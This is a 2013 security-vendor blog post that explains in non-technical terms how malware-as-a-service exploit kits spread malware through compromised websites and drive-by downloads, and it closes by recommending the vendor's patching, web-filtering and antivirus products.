Wednesday, 4 December 2013

Malware as a Service

Cloud based services are all the rage these days, every kind of software services available are typically available as a cloud or software as a service offering. And when we say every kind of software service, we do mean every kind of software service – including malicious software services. Malware as a service has become by far the most common way that malware is distributed. Here we’ll attempt to give a non-technical overview of how this industry works.

So what exactly is Malware-as-a-Service (MaaS) and why it is used?

Malware as a service is essentially an online service which is used by people who have written a specific piece of malware and want this to get distributed quickly. Essentially what the MaaS does is take the headache out of distributing the malware. Let’s say you’ve written your own malware program which you want to distribute. You could do a few things to help push its distribution

1. Infect pirated software with your malware and upload it to common piracy websites
2. Create a website which invites visitors to download something fake which in reality is your malware
3. Make the virus self-replicating and distribute it via some kind of software vulnerability
4. Infect your friends USB sticks with the malware and rename it to something which they are likely to open

As you can see all of the above either require a significant amount of effort or are not really effective. The MaaS also known as exploit kits effectively allow you to distribute your malware at a very cost-effective price. If your malware is going to give you financial benefits, then a MaaS service to distribute the malware widely will be very handy, and very cheap. Quoted prices from certain exploit kits start from as low as $50 for using the kit for a day, to $1500 for a year’s service making it very cheap considering its effectiveness.

But how does the infection happen?

There are a number of steps which happen to infect a user. Let’s say that you don’t want to go through the above processes to distribute the malware and you’ve decided to use an exploit kit. After paying for the service, the following will happen

Step 1: Your malware is loaded onto a distribution server ready to get deployed to new victims

Step 2: The MaaS authors discover web servers of legitimate software which have problems or vulnerabilities in their setups. These vulnerabilities allow the MaaS authors to inject a piece of hidden HTML code which will be used to perform certain malicious actions

Step 3: A normal user visits the legitimate (but compromised) website. The hidden code analyses the user and detects what browser and other software they have installed on their computer. If the user has software which has not been unpatched then the next step is executed

Step 4: Based on the analysis in step 3 the user is redirected to another website which will use a targeted exploit to infect the user with the malware. As an example, if a user has a version of Java which hasn’t been updated, they will be redirected to an Java exploit

Step 5: The exploit is executed which deploys the malware using the unpatched vulnerability

The effectiveness of the distribution is due to a number of reasons

1. The sheer amount of compromised websites (millions) which exist on the internet right now and which will keep getting compromised in the future allowing for a huge audience to be exposed to the malware
2. The fact that these sites are actually legitimate sites which normal users will visit – they just have been hijacked with some invisible malicious code

3. The delivery of an exploit targeted to the specific user’s unpatched software – they will attach the user with an exploit which they know will work

4. The fact that the exploit does not need any kind of additional user interaction such as a click or a download. Just visiting the website will result in an infection (what is termed as a drive-by download)

5. The lucrative business of MaaS which allows the authors to keep expanding the sites they use, the exploits they use, the AV avoidance techniques

6. Using spamming, SEO poisoning, or other techniques to push users towards the compromised sites

How effective are these kits? And how many of them are there?

Very effective. Different security vendors quote different numbers for each kit, but all of them agree on one common conclusion. These malicious websites used by these kits make up the absolute majority of threats in the wild today. The majority of infections which happen today are coming from these exploit kits. Old viruses and distribution methods have become insignificant when compared to these new malicious URLs. There are tens of exploits kits out there, the Blackhole Exploit kit used to be one of the most effective (though the author Paunch has reportedly been arrested and the kit is no longer being updated), Neutrino, Glazunov and many more. As the business gets more lucrative the MaaS authors start to get competitive between themselves, making improvements in all aspects of the kit from usability, price, infection and obfuscation techniques.

Ouch! … How do I protect myself and my employees?

Essentially, you can never keep know or keep track of which legitimate websites have been compromised so you need a little help. You’ll need to put multiple mechanisms in place to protect yourself and your employees. First, you need to make sure all the browsers and software on your user’s machines have been fully patched – Languard or GFI Cloud – Patch Management is an essential tool to help you with this. Second, you need to put a web security software in place which stops users from visiting websites which have been detected to contain malicious payloads. GFI WebMonitor or GFI Cloud Web Protection both will protect your users from visiting these websites. Thirdly, you still need to have an Anti-Virus on your machines to ensure that malicious software payloads are detected and stopped – GFI Cloud – Anti-virus is the right tool here. If you miss any of these protections, it’s only a matter of time before your users are exposed to something dangerous without their knowledge.